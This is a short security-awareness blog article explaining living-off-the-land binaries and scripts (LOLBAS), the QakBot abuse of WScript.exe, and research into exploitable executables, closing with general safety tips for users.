In the world of IT and cybersecurity, there’s a funny-looking word that might raise your eyebrows: LOLBAS. It stands for Living-off-the-Land Binaries and Scripts. While it sounds silly, it refers to ordinary files like your favorite Microsoft Office apps and other executables that you find on your computer. These seemingly innocuous files can become powerful tools in the hands of cybercriminals when used maliciously, turning your computer into a hacker’s playground.

The paranoid in you might start panicking and delete any random executable file you see in your computer willy-nilly. But the problem is that LOLBAS files are legitimate files that are likely necessary for your Windows operating system to work normally. Many of these files also tend to be digitally signed by Microsoft, indicating validity and authenticity of these files, but that also what makes them attractive targets for hackers.

Since users and security systems trust these signed files, malicious activities carried out through them can slip under the radar undetected. LOLBAS files can be abused and manipulated to download and run malicious payloads, and your computer’s antivirus and other security mechanisms may not raise any alarms.

Microsoft-Office-LOLBAS

In January 2023, a paper described how the QakBot malware was able to spread by exploiting a common LOLBAS file called WScript.exe, a Windows service that provides scripting abilities.

Even popular third-party executables can be exploited too, as proven by security researcher Nir Chako who created a tool to automate the discovery of exploitable executables.

In his published research, Chako stated that prior knowledge of executable files as potential targets can help organizations take necessary precautions and mitigate risks. It also pays for ordinary users to stay informed, to keep their software updated, and practice safe browsing. A simple click on a malicious link is often all that’s needed to trigger a malware infection.

Leave a comment

Your email address will not be published. Required fields are marked *